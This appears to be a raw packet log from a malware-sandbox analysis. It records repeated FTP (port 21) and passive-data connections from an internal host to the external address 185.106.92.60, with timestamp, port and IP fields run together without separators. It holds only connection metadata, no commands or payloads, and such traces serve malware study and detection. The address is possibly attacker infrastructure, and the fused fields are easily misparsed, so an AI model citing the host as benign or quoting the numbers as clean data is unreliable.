                                                                                                                                    Oct 10, 2022 06:03:16.979774952 CEST6465349942185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.979948997 CEST4994264653192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.980235100 CEST4994121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.005172968 CEST2149941185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.005407095 CEST4994121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.005959988 CEST4994264653192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.031925917 CEST2149941185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.032118082 CEST4994121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.032183886 CEST4994121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.032444954 CEST6465349942185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.032608986 CEST6465349942185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.032757998 CEST4994264653192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.054653883 CEST2149941185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.054687023 CEST2149941185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.054992914 CEST4994121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.187891960 CEST4994321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.210645914 CEST2149943185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.210757017 CEST4994321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.239595890 CEST2149943185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.239638090 CEST2149943185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.239670038 CEST2149943185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.239694118 CEST4994321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.239732981 CEST4994321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.240010023 CEST4994321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.263040066 CEST2149943185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.263187885 CEST4994321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.272978067 CEST4994321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.336133957 CEST2149943185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.336234093 CEST4994321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.336414099 CEST4994321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.359296083 CEST2149943185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.359391928 CEST4994321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.359582901 CEST4994321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.382675886 CEST2149943185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.382765055 CEST4994321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.384493113 CEST4994321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.407927036 CEST2149943185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.408020973 CEST4994321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.409260035 CEST4994321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.432590961 CEST2149943185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.432688951 CEST4994321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.433008909 CEST4994464654192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.457417011 CEST6465449944185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.457567930 CEST4994464654192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.457890987 CEST4994321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.482434034 CEST2149943185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.482511997 CEST4994321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.484091043 CEST4994464654192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.508349895 CEST6465449944185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.511018038 CEST6465449944185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.511265039 CEST4994464654192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.511759996 CEST2149943185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.511873007 CEST4994321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.518254042 CEST4994321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.540946007 CEST2149943185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.540997982 CEST2149943185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.541069031 CEST4994321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.665674925 CEST4994521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.689847946 CEST2149945185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.690041065 CEST4994521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.717571974 CEST2149945185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.717602015 CEST2149945185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.717705965 CEST4994521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.717812061 CEST2149945185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.717869043 CEST4994521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.727380991 CEST4994521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.752640963 CEST2149945185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.754968882 CEST4994521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.755116940 CEST4994521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.779953003 CEST2149945185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.780118942 CEST4994521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.780317068 CEST4994521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.803994894 CEST2149945185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.808095932 CEST4994521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.808423996 CEST4994521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.833559036 CEST2149945185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.835175037 CEST4994521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.835573912 CEST4994521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.860918045 CEST2149945185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.864130974 CEST4994521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.865195036 CEST4994521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.891993046 CEST2149945185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.894053936 CEST4994521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.894256115 CEST4994664655192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.919573069 CEST6465549946185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.919874907 CEST4994664655192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.920344114 CEST4994521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.946026087 CEST2149945185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.946182013 CEST4994521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.946763039 CEST4994664655192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.970045090 CEST2149945185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.970727921 CEST6465549946185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.971100092 CEST4994521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.971146107 CEST6465549946185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.971221924 CEST4994521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.971261024 CEST4994664655192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:17.996035099 CEST2149945185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.996171951 CEST2149945185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:17.996351957 CEST4994521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.112891912 CEST4994721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.136020899 CEST2149947185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.136204958 CEST4994721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.162647963 CEST2149947185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.162702084 CEST2149947185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.162734985 CEST2149947185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.162889004 CEST4994721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.163140059 CEST4994721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.185878038 CEST2149947185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.187328100 CEST4994721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.188530922 CEST4994721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.211631060 CEST2149947185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.212250948 CEST4994721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.212343931 CEST4994721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.235225916 CEST2149947185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.238436937 CEST4994721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.238584995 CEST4994721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.261684895 CEST2149947185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.262290955 CEST4994721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.263957024 CEST4994721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.286971092 CEST2149947185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.287651062 CEST4994721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.289724112 CEST4994721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.312994957 CEST2149947185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.316236019 CEST4994721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.316607952 CEST4994864656192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.339780092 CEST6465649948185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.339946032 CEST4994864656192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.340342999 CEST4994721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.363352060 CEST2149947185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.364264965 CEST4994721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.364721060 CEST4994864656192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.387598038 CEST6465649948185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.387778997 CEST2149947185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.387814999 CEST6465649948185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.388003111 CEST4994721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.388115883 CEST4994864656192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.395414114 CEST4994721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.418181896 CEST2149947185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.418235064 CEST2149947185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.418555021 CEST4994721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.524013996 CEST4994921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.547250986 CEST2149949185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.547485113 CEST4994921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.574093103 CEST2149949185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.574147940 CEST2149949185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.574181080 CEST2149949185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.574501038 CEST4994921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.574793100 CEST4994921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.597697020 CEST2149949185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.600281000 CEST4994921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.600440979 CEST4994921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.623279095 CEST2149949185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.624245882 CEST4994921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.634057999 CEST4994921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.656996965 CEST2149949185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.657155991 CEST4994921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.661717892 CEST4994921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.684932947 CEST2149949185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.685113907 CEST4994921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.695871115 CEST4994921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.719233990 CEST2149949185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.719388008 CEST4994921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.729595900 CEST4994921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.753042936 CEST2149949185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.753323078 CEST4994921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.755995989 CEST4995064657192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.780958891 CEST6465749950185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.781104088 CEST4995064657192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.781393051 CEST4994921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.804518938 CEST2149949185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.804860115 CEST4994921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.805417061 CEST4995064657192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.828921080 CEST2149949185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.829044104 CEST4994921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.829202890 CEST4994921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.830666065 CEST6465749950185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.830924988 CEST6465749950185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.831124067 CEST4995064657192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.851742983 CEST2149949185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.851794958 CEST2149949185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.851895094 CEST4994921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.967231035 CEST4995121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:18.991734028 CEST2149951185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:18.991883039 CEST4995121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.019108057 CEST2149951185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.019156933 CEST2149951185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.019187927 CEST2149951185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.019362926 CEST4995121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.019905090 CEST4995121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.045886993 CEST2149951185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.046176910 CEST4995121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.047166109 CEST4995121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.073048115 CEST2149951185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.073323965 CEST4995121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.073656082 CEST4995121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.098038912 CEST2149951185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.098283052 CEST4995121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.098540068 CEST4995121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.122941017 CEST2149951185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.123198986 CEST4995121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.124718904 CEST4995121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.148592949 CEST2149951185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.148699999 CEST4995121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.149662971 CEST4995121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.174160957 CEST2149951185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.174453020 CEST4995121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.174799919 CEST4995264658192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.199294090 CEST6465849952185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.199661970 CEST4995264658192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.200412035 CEST4995121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.226449966 CEST2149951185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.226707935 CEST4995121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.227196932 CEST4995264658192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.250695944 CEST6465849952185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.250746965 CEST6465849952185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.250870943 CEST4995264658192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.251770973 CEST2149951185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.252013922 CEST4995121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.252176046 CEST4995121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.276160002 CEST2149951185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.276206017 CEST2149951185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.276381969 CEST4995121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.405293941 CEST4995321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.428328037 CEST2149953185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.428531885 CEST4995321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.454668999 CEST2149953185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.454724073 CEST2149953185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.454947948 CEST2149953185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.454965115 CEST4995321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.455060959 CEST4995321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.455195904 CEST4995321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.478315115 CEST2149953185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.478549957 CEST4995321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.478743076 CEST4995321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.502039909 CEST2149953185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.502171040 CEST4995321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.502334118 CEST4995321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.525500059 CEST2149953185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.525747061 CEST4995321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.525990009 CEST4995321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.549485922 CEST2149953185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.549710989 CEST4995321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.550642967 CEST4995321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.573945999 CEST2149953185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.574250937 CEST4995321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.576997995 CEST4995321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.600809097 CEST2149953185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.601020098 CEST4995321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.601501942 CEST4995464660192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.626305103 CEST6466049954185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.626560926 CEST4995464660192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.632149935 CEST4995321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.655942917 CEST2149953185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.656084061 CEST4995321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.656704903 CEST4995464660192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.680125952 CEST2149953185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.680399895 CEST4995321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.680560112 CEST4995321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.681919098 CEST6466049954185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.681972980 CEST6466049954185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.682106972 CEST4995464660192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.703474045 CEST2149953185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.703525066 CEST2149953185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.703744888 CEST4995321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.829704046 CEST4995521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.855137110 CEST2149955185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.855356932 CEST4995521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.886348009 CEST2149955185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.886406898 CEST2149955185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.886439085 CEST2149955185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.886601925 CEST4995521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.886787891 CEST4995521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.886789083 CEST4995521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.912276030 CEST2149955185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.912411928 CEST4995521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.912599087 CEST4995521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.937549114 CEST2149955185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.937679052 CEST4995521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.938644886 CEST4995521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.964757919 CEST2149955185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.964860916 CEST4995521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.965032101 CEST4995521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.992727995 CEST2149955185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:19.993350029 CEST4995521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:19.993350029 CEST4995521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.017993927 CEST2149955185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:20.018086910 CEST4995521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.019068956 CEST4995521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.046725035 CEST2149955185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:20.046911955 CEST4995521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.048815966 CEST4995664661192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.072170019 CEST6466149956185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:20.072293043 CEST4995664661192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.072577000 CEST4995521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.097841978 CEST2149955185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:20.097960949 CEST4995521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.098411083 CEST4995664661192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.122982979 CEST6466149956185.106.92.60192.168.2.3
